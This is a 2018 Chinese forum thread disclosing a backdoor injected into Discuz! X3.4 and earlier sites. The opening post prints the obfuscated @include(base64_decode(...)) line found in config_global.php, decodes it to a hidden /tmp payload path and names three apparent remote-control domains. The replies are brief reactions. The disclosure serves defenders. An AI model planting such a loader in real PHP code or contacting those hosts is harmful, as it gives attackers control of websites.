草根吧_非盈利论坛_免费discuz插件_discuz风格模板_微擎资源_phpwind插件_phpwind教程_php技术交流平台

Discuz! X3.4版本以下/config/config_global.php注入漏洞@include(base64_decode公示

作者：民审-M 发布时间：2018-09-28 16:19 回复数：12 浏览数：248

24812民审-M金牌草根

热门 2018-09-28 16:19:58

24812 热门 2018-09-28 16:19:58

话题：版本注入漏洞以下注入漏洞

本帖最后由民审-M 于 2018-9-28 16:22 编辑

Discuz! X3.4版本以下/config/config_global.php注入漏洞：
@include(base64_decode('L3RtcC8uVGVzdC11bml4L2NsaWVudC5waHA='));

解析：
写入服务器/tmp/.Test-unix/client.php
远程控制注入地址：

www.womendemengxiang.com

gbk.baidu901.com

9a9vj.com:8888

内容：

本部分内容设定了隐藏,需要回复后才能看到

分享喜欢 0 回复

回复

12条回应只看楼主最新

沙发奥黛丽赫本步入草根 2018-09-28 21:38

666666666666

回复

板凳地摊网终身ViP 2018-10-01 01:08

前几天我就被这漏洞注入了

回复

地板空白影子步入草根 2018-10-01 20:21

学习学习顶

回复

4楼美女丶别跑呀步入草根 2018-10-08 14:38

66666666看看内容

回复

5楼decode步入草根 2018-10-10 15:31

需要详细信息

回复

6楼Master步入草根 2018-10-17 19:40

太厉害呀

回复

7楼谁是我的谁步入草根 2018-10-28 20:58

这是很久以前的了吧

回复

8楼天空的风步入草根 2018-10-30 09:56

看看这个

回复

9楼人生难懂步入草根 2018-10-31 14:23

好好好

回复

10楼不曾止步步入草根 2018-11-07 21:32

这个帖子不回对不起自己！我想我是一天也不能离开草根吧。

回复

11楼我是天空 2018-11-27 10:39

是吗？

回复

12楼猫大熊 2018-12-05 14:41

大哥牛X

回复

登录后才可以回帖，登录或者注册